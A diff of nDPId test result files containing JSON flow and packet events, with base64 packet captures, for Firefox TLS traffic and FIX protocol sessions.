+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1387,"flow_first_seen":1620927998806,"flow_last_seen":1620927999915,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1189641,"flow_avg_l4_payload_len":857,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":434,"flow_first_seen":1620927999109,"flow_last_seen":1620927999830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":353696,"flow_avg_l4_payload_len":814,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":646,"flow_first_seen":1620927999111,"flow_last_seen":1620927999879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":545091,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":878,"flow_first_seen":1620927999112,"flow_last_seen":1620927999897,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":744373,"flow_avg_l4_payload_len":847,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","packets-captured":5441,"packets-processed":5441,"total-skipped-flows":0,"total-l4-data-len":4593506,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":6,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":45,"global_ts_msec":1620927999948} 
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5441/5441 diff --git a/test/results/fix.pcap.out b/test/results/fix.pcap.out index 31ae6ab01..2c9efd784 100644 --- a/test/results/fix.pcap.out +++ b/test/results/fix.pcap.out 
@@ -1,77 +1,77 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"fix.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1493755109242} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7440000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1493755109242,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755109242,"pkt":"THK5MeMlACJNe\/gxCABFAACKT3MAAPUGlw4IERYfwKgAFA+gqko3bYCMRQ1qAYAY\/\/+s3wAAAQEICsq+JozkIvOrOD1PATk9MDA3NQEzNT1HAQIgAAANgQxAKWj1wo9cKQAAAAEAABRnDEBj4euA7PpqAAAAAQAADiEMQENwo99tuUEAAAABAAAMAwxAYm64YJmdywAAAAE="} -00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7440000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1493755109243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109243,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA04yxAAEAGeKvAqAAUCBEWH6pKD6BFDWoBN22A4oAQ\/+CtQgAAAQEICuQi8\/bKviaM"} 
-00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1493755109243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1493755109243,"pkt":"THK5MeMlACJNe\/gxCABFAABNT3sAAPUGl0MIERYfwKgAFA+gqko3bYDiRQ1qAYAY\/\/8cMQAAAQEICsq+JozkIvOrOD1PATk9MDAxNAEzNT1QAQA4AAAUjFEGgw=="} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7440000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1493755109264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1493755109264,"pkt":"THK5MeMlACJNe\/gxCABFAABSVaMAAPUGkRYIERYfwKgAFA+gu2Bwv8eLGL2htoAY\/\/8FlAAAAQEICsq+JqLD2CKPOD1PATk9MDAxOQEzNT1QAQBgAAAA1ygEAAAC+SgE"} 
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7440000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1493755109265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109265,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA0nQVAAEAGvtLAqAAUCBEWH7tgD6AYvaG2cL\/HqYAQ\/+ACDgAAAQEICsPYIsvKviai"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755109301,"pkt":"THK5MeMlACJNe\/gxCABFAABPilIAADIGAaLQ9WsDwKgAFA+gsgqYEHEay+C1D1AYXjiwMAAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} -00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoLPdAAEAGESTAqAAU0PVrA7IKD6DL4LUPmBBxQVAQ\/\/9nMgAAAAAAAAAA"} 
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00557{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1493755109301,"pkt":"THK5MeMlACJNe\/gxCABFAAB3JWUAAPUGwS8IERYfwKgAFA+gu1Cc6Eb967pj5oAY\/\/+1oAAAAQEICsq+Jsaxc69UOD1GSVguNC4xATk9MDAwMDQxATM1PTABMzQ9MDA2MTI3ATQzPU4BNTI9MjAxNzA1MDItMTk6NTg6MjkBMTA9MTEzAQ=="} -00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
-00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB+LPhAAEAGEM3AqAAU0PVrA7IKD6DL4LUPmBBxQVAY\/\/8uDQAAOD1GSVhDT01QATk9NzEBeJwNx7ENgDAMBED9QER+x684kdwisQEtDR0N+xdw3WXtx9miEbPMQugqQ48\/iuGQlxuHyXzjXMrlCdLrvt4HtKKED90WDdY="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA04B5AAEAGe7nAqAAUCBEWH7tQD6DrumPmnOhHQIAQ\/+BBSgAAAQEICrFztPLKvibG"} -00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1493755109365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1493755109365,"pkt":"THK5MeMlACJNe\/gxCABFAABXdbIAAPUGcQIIERYfwKgAFA+gu2Bwv8epGL2htoAY\/\/9rRwAAAQEICsq+JwbD2CLLOD1PATk9MDAyNAEzNT1HAQCIAAAA1gw\/8YUeuFHrhQAAAAE="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1493755109440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1493755109440,"pkt":"THK5MeMlACJNe\/gxCABFAABLyzMAADIGwMTQ9WsDwKgAFA+gshDsZRC0r0wvBlAYWghECQAAOD1PATk9MDAyNAEzNT1HAQCIAAAAVgxAWLVwoAAAAAAAAAE="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
-00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1493755109440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755109440,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoPkFAAEAG\/9nAqAAU0PVrA7IQD6CvTC8G7GUQ11AQo65yMAAAAAAAAAAA"} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1493755109654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755109654,"pkt":"THK5MeMlACJNe\/gxCABFAABbr+gAAPUGNsgIERYfwKgAFA+gu1oMn5kifDan54AY\/\/9QgQAAAQEICsq+KCgaP0xfOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} 
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1493755109655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109655,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA07JVAAEAGb0LAqAAUCBEWH7taD6B8NqfnDJ+ZSYAQhgAbHwAAAQEICho\/VIrKvigo"} -00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1493755109655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755109655,"pkt":"ACJNe\/gxTHK5MeMlCABFAACK7JZAAEAGbuvAqAAUCBEWH7taD6B8NqfnDJ+ZSYAYhgDh+QAAAQEICho\/VIrKvigoOD1GSVhDT01QATk9NzEBeJwNx7ENgDAMBED9QER+x684kdwisQEtDR0N+xdw3WXtx9miEbPMQugqQ48\/iuGQlxuHyXzjXMrlCdLrvt4HtKKED90WDdY="} 
-00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1493755109941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1493755109941,"pkt":"THK5MeMlACJNe\/gxCABFAABLyzQAADIGwMPQ9WsDwKgAFA+gshDsZRDXr0wvBlAYWgiDjAAAOD1PATk9MDAyNAEzNT1HAQCIAAAAWQxAldWZn+Q2dgAAAAE="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7440000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1493755110320,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1493755110320,"pkt":"THK5MeMlACJNe\/gxCABFAAB1U\/wAADIGN9LQ9WsDwKgAFA+glvwzTd9PWnk+l1AYb96N\/wAAOD1PATk9MDA2NgEzNT1HAQHYAAAABVkI5OEMFeFiPZCEMAATlYJyAAAABFkI5OEMFVZHfdCEMAATwIJ3AAAABlkI5OEIW+2APQJxEAQ="} 
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7440000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1493755110328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755110328,"pkt":"THK5MeMlACJNe\/gxCABFAABb5\/wAAPUG\/rMIERYfwKgAFA+gn9aNJ1RO\/ryrG4AY\/\/8NBQAAAQEICsq+KsnWRqh9OD1PATk9MDAyOAEzNT1HAQCoAAAAAVkI5OEMBKkS\/dCEMAAJlIEx"} 
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1493755110328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755110328,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA0b9ZAAEAG7AHAqAAUCBEWH5\/WD6D+vKsbjSdUdYAQ\/\/\/knQAAAQEICtZGrHjKvirJ"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1493755110362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755110362,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAouAtAAEAGhg\/AqAAU0PVrA5b8D6BaeT6XM03fnFAQ\/GxkGwAAAAAAAAAA"} 
